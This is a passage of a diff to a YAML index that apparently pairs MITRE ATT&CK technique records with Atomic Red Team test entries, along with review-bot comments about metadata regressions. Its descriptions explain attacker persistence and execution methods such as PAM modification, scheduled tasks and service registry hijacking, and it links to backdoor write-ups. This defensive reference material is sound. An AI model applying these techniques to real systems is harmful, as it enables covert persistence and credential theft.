kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
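Review bot: revoked: false is now carried on T1204.001 (and on T1203 and T1569 earlier in this diff); if the index loader does not yet look at revoked, this is the moment to have it skip or flag revoked: true objects, otherwise a future regeneration will keep listing atomic tests under a technique upstream has withdrawn. x_mitre_permissions_required: User is dropped here as well, matching the other objects in this diff, and x_mitre_remote_support: false is new for this sub-technique.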
@@ -56800,9 +57182,8 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests:
- name: Execute a Command as a Service
@@ -57065,10 +57446,10 @@ execution:
elevation_required: true
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -57131,7 +57512,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -57165,8 +57546,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -57175,6 +57556,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
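Review bot: the new Malicious Life by Cybereason URL carries a #blog-subscribe fragment, which anchors to the page's subscription widget rather than the article; strip the fragment (https://www.cybereason.com/blog/wmi-lateral-movement-win32) so the reference resolves to the content it is cited for. The entry also records the author with (n.d.) while giving a retrieved date of June 19, 2024; if the upstream record has the publication date, carry it through.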
@@ -57187,7 +57572,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -57253,23 +57637,24 @@ execution:
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
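Review bot: the added sentence cites (Citation: Red Canary - Atomic Red Team), i.e. this repository's own T1053.005.md, as the source for the Invoke-CimMethod / PS_ScheduledTask method; that makes the vendored ATT&CK description depend on a document this repo maintains, so renaming or moving that file later breaks the upstream reference. There is nothing to change in this hunk, since the text is upstream MITRE content and should not be edited locally, but it is worth recording before the next reshuffle of the atomics tree. The 'Powershell Cmdlet' capitalization is likewise upstream and not something to fix here.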
@@ -57316,7 +57701,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -57348,8 +57733,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -57363,6 +57748,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -57375,11 +57764,14 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -57758,7 +58150,7 @@ persistence:
schtasks /Delete /TN "#{task_name}" /F
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
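Review bot: the modified timestamp for T1205.002 moves backwards, from 2022-11-08T14:00:00.188Z to 2022-10-20T19:56:18.579Z; the same backwards move appears later for T1133 (2023-05-09 to 2023-03-30) and LC_LOAD_DYLIB (2022-05-11 to 2022-04-20), and every old value shares the 14:00:00.188Z suffix, which reads like a bulk stamp from an earlier import rather than a real per-object edit time. The new values are presumably the authoritative upstream ones, but if any tooling compares modified to decide whether an object is stale, a timestamp that goes backwards could make it skip a refresh, so confirm that path.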
@@ -57821,7 +58213,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -57886,49 +58277,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -57943,20 +58295,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
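Review bot: x_mitre_permissions_required: root is removed from T1556.003 without replacement, as with the other techniques in this diff; the remaining changes are a key reorder (x_mitre_contributors and x_mitre_platforms move above x_mitre_version) and a reorder of external_references so that PAM Creds now precedes Red Hat PAM. Citations in the description are resolved by source_name, so the reorder is harmless, but having the generator emit references in a stable order (for example upstream order) would keep diffs like this one reviewable.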
@@ -58168,7 +58557,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -58256,7 +58644,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -58379,11 +58766,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58461,7 +58847,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -58540,7 +58925,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -58563,11 +58948,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -58625,9 +59009,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
@@ -58777,7 +59160,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests:
- name: UEFI Persistence via Wpbbin.exe File Creation
@@ -58798,7 +59180,7 @@ persistence:
elevation_required: true
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -58817,7 +59199,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -58831,7 +59212,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -58858,8 +59238,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -58890,7 +59270,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -59006,11 +59387,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -59082,9 +59462,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -59100,7 +59480,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests:
- name: Add a driver
@@ -59170,7 +59549,7 @@ persistence:
elevation_required: true
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -59245,7 +59624,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests:
- name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -59356,7 +59734,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -59380,8 +59758,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
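Review bot: TFTP Boot loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk with no replacement value added, whereas every other technique touched by this patch gets `x_mitre_attack_spec_version: 3.2.0` re-emitted (T1053.003, T1137, T1137.006, T1574.011). T1505.002 further down shows the identical pattern (both fields dropped, nothing re-added). Together with the backward `modified` dates on these two objects, this suggests they were serialized from an older source object; worth checking whether the upstream entries carry the field at all, or whether the generator silently drops it when the source object lacks it.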
@@ -59536,7 +59912,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -59748,26 +60123,7 @@ persistence:
elevation_required: true
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
